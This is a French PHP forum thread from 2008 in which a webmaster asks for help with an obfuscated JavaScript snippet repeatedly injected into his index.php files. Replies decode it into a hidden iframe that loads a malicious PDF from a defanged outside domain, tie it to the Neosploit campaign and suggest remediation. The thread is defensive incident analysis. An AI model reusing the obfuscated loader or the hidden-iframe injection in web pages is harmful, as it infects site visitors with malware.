Retourner sur PHPFrance

 FAQFAQ   RechercherRechercher   Liste des MembresListe des Membres   Groupes d'utilisateursGroupes d'utilisateurs   Accéder aux archivesArchives  S'enregistrerS'enregistrer 
 ProfilProfil   Se connecter pour vérifier ses messages privésSe connecter pour vérifier ses messages privés   ConnexionConnexion 
PHPFrance est maintenu par des bénévoles et soutenu par les sociétés Actoo et Anaska, Conseil et Formation pour PHP
Pour optimiser vos chances commencez par consulter la FAQ et faites une recherche.
Bon esprit, politesse et entraide sont les règles de ce forum.

Sécurite: Problème sur mes Index.php

 
Poster un nouveau sujet   Répondre au sujet    PHPFrance Index du Forum -> Autres sujets informatiques
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
nemrod
Maitre du phpinfo()


Inscrit le: 28 Mai 2008
Messages: 32
MessagePosté le: 17 Nov 2008, 05:15    Sujet du message: Sécurite: Problème sur mes Index.php Répondre en citant
Salitation,

Ca fait un bon moment, j'ai remarqué un code qui s'ajoute a tout mes fichiers index.php. Je ne connais ni l'origine ni la raison.

J'ai aussi remarqué que ce code vient juste après la balise <body> ou juste avant la balise </body>

Code:
<script language=JavaScript> function jbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,39,22,1,14,38,60,18,9,0,0,0,0,0,0,58,48,35,28,33,55,56,41,23,6,37,3,45,46,42,24,12,47,17,15,57,54,31,40,20,19,25,0,0,0,0,0,0,4,16,32,52,7,10,11,61,59,8,43,44,51,5,2,34,29,62,36,13,50,27,26,21,53,49);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(208^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}jbnb25('26kQdriGrSfGz8wGBUrhXrkQy10@drilJUvLr8N02fwMs3grEm1MUfwlh3g7rIvQyU5@2Y1LASNWmUM7F8fGcNr00V1ld8vMs6iQr@VMrwiQ0Y@0QV0rqIgGF@QW03NQdpV2z8fMrgwlr8iQhpVr@YMTJHMTTQ0hWV5Ty10rEgS726gLspvisHMFABvLT1gMsU1FcS57B8wN73viuYvMBofQz6N@rrkQyfQil0VMUfwlh3kiE2S')   </script>


Comment s'en debarasser et est-ce-que vous avez une idée sur la faille sécuritaire que ce code utilise.

Merci pour votre aide.
Voir le profil de l'utilisateur Envoyer un message privé
stopher
Eléphant


Inscrit le: 23 Oct 2008
Messages: 537
Localisation: Nord - Lille
Ce membre fait partie des ViPHP
MessagePosté le: 17 Nov 2008, 08:08    Sujet du message: Répondre en citant
Salut ,

Je pense à plusieurs possibilités pour ces ajout de code :

1: ton code contient une faille qui permet à un pirate de lancer du code qu'il a injecté sur ton serveur , genre faille au niveau d'un upload de fichiers.

2: ton serveur a été piraté , et un genre de "rootkit" tourne dessus , car pour modifier le contenu de fichiers sur un serveur , il te faut la main ( d'une certaine maniére dessus ).

3: Ton poste de développement et aussi peut être vérolé .. et tu uploads tes fichiers vérolés à ton insu sur ton serveur ...

Essaye de voir les dernières modifications de tes fichiers , épluches les log , regardes les process qui tournent sur ton serveur , fais des tests , en créant un nouveau fichier index et surveille le ...

Maintenant , je ne suis pas non plus un expert en sécurité , mais l'ajout de code dans mes fichiers sur mon serveur , m'inquiéterai énormément ...

bon courage ...
cdt,
Stopher.
_________________
Mon mémo : lindev
Soutenez L'AFUP
Soutenez L'APRIL
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur MSN Messenger
Sékiltoyai
Ganesha


Inscrit le: 22 Avr 2007
Messages: 4573
Localisation: Le Havre | Rennes
Ce membre fait partie des ViPHP
MessagePosté le: 17 Nov 2008, 08:56    Sujet du message: Répondre en citant
Pour information, après décryptage, ce code exécute ceci :
Code:
window.status='Done';document.write('')

Le cryptage est soit dit en passant particulièrement inutile dans la mesure où il est très simple quand on a la clé, l'algorithme et la chaine cryptée de trouver la chaine décryptée…
_________________
http://phpfrance.miniville.fr
http://www.lastfm.fr/user/Sekiltoyai
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail MSN Messenger
@rthur
Ganesha


Inscrit le: 07 Fév 2005
Messages: 3004
Localisation: Issy-les-Moulineaux
Ce membre fait partie des ViPHP
MessagePosté le: 17 Nov 2008, 08:56    Sujet du message: Répondre en citant
Bonjour,

Voila ce que donne le code javascript que tu as posté une fois décodé:
Code:
window.status='Done';
document.write('<iframe name=874e
src="http://7addition[ATTENTION_VIRUS].info/t/?'
+Math.round(Math.random()*46556)+'874e'+'" width=452 height=103 style="display:none"></iframe>')
Il renvoie effectivement vers une page qui contient un virus dans un fichier PDF, j'ai ajouté le tag "[ATTENTION_VIRUS]" pour éviter qu'un visiteur de PHPfrance copie-colle ce javascript et le teste sans prendre les précaution d'usage. Wink

En clair c'est véritablement un code malfaisant par conséquent, suit les instructions données par stopher et commence par:
1) faire une sauvegarde de tes fichiers importants
2) installe un antivirus/firewall efficace
_________________
Quand tout le reste à échoué, lisez le mode d'emploi...
Voir le profil de l'utilisateur Envoyer un message privé MSN Messenger
Sékiltoyai
Ganesha


Inscrit le: 22 Avr 2007
Messages: 4573
Localisation: Le Havre | Rennes
Ce membre fait partie des ViPHP
MessagePosté le: 17 Nov 2008, 08:58    Sujet du message: Répondre en citant
Merde le document.write m'a tué.

Edit : Après re-test on est d'accord @rthur Smile
_________________
http://phpfrance.miniville.fr
http://www.lastfm.fr/user/Sekiltoyai
Voir le profil de l'utilisateur Envoyer un message privé Envoyer un e-mail MSN Messenger
nemrod
Maitre du phpinfo()


Inscrit le: 28 Mai 2008
Messages: 32
MessagePosté le: 18 Nov 2008, 04:31    Sujet du message: Répondre en citant
Merci stopher, Sékiltoyai et @rthur pour vos reponses.

Pour mon code, Je ne sais pas si il contient une faille mais j'ai verifié sur d'autres sites que j'ai realisé (avec la meme methodologie) et aucun d'eux n'est infectés.

Pour le serveur, je suis avec avec un hebergeur globat.com, et d'apres eux, il n'y a ni spayware ni virus sur le serveur.

Pour mon poste de développement, je l'ai scanné 1000 fois avec McCafé, Kaspersky et l'Anti-Malware ... et rien n'a été trouvé.

Mais ce que j'ai constaté:
C'est un code qui vient apres suppression. Je le retrouve sur mes page 1 à 2 semaines après.
C'est un code qui ne touche que les pages INDEX.PHP.
Je ne pense pas que mes bases de données ont été touché.
Je suis sur que c'est un robot et non un pirate.
Je pense que c'est peut etre une faille dans mes include

Je vais suivre vos conseils, downlaoder tout le site (plus de 3000 pages), vider tout le site, nettoyer les pages une à une, scanner le ficher avec un anti-virus et ré-uploader tout.

Sad j'ai perdu 75% de mes visiteurs...
Voir le profil de l'utilisateur Envoyer un message privé
mojorisin
Ma première boucle


Inscrit le: 07 Fév 2005
Messages: 144
Localisation: Lyon, Rhône, France
MessagePosté le: 18 Nov 2008, 07:26    Sujet du message: Répondre en citant
Bonjour,
je pense que vous devriez modifier vos code d'accès FTP.
En fait ce type de chose ressemble à une attaque avec neosploit.

Citation:

Plusieurs vagues d’attaques informatiques ont été lancées ces derniers jours à l’encontre de dizaines de milliers de sites Internet, dans le but de les compromettre discrètement et d’infecter ainsi, ensuite, les internautes les visitant. Elles utilisent un code malveillant dénommé "Neosploit".

Lorsqu’un internaute visite un site compromis par Neosploit, ce dernier adapte son attaque à la configuration de l’internaute : il teste ainsi l’ordinateur ciblé, détermine ses vulnérabilités et conduit ensuite l’attaque par le moyen le plus adapté.

En l’état de l’analyse réalisée par le Centre opérationnel de la sécurité des systèmes d’information (COSSI) de la Direction centrale de la sécurité des systèmes d’information (DCSSI), les vulnérabilités exploitées sont toutes connues (vulnérabilités du logiciel Adobe Acrobat, du lecteur QuickTime ainsi que de certains contrôles ActiveX d’Internet Explorer). Une machine mise à jour de ses correctifs de sécurité ne peut donc a priori pas être compromise.

Le COSSI dispose par ailleurs d’une liste de sites français potentiellement compromis. Il s’agit exclusivement de sites de transferts de fichiers (FTP) et non pas de sites Internet (HTTP) utilisés par les internautes pour naviguer. Cependant, dans certains cas, ces sites FTP sont utilisés pour administrer des sites HTTP.

Ces sites FTP sont principalement gérés par des particuliers ou des PME. Les différents opérateurs qui hébergent ces sites Internet potentiellement compromis ont été prévenus.


News tiré de http://www.securite-informatique.gouv.fr/gp_article652.html

Autre informations :
http://securite.reseaux-telecoms.net/actualites/lire-le-toolkit-neosploit-refait-surface-18867.html
http://www.itrnews.com/articles/82970/neosploit-3-1-retour.html

Et sinon google Very Happy
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web de l'utilisateur
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    PHPFrance Index du Forum -> Autres sujets informatiques Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  
Vous pouvez poster de nouveaux sujets dans ce forum
Vous pouvez répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum
Powered by phpBB © phpBB Group - PHPFrance est hébergé par Sivit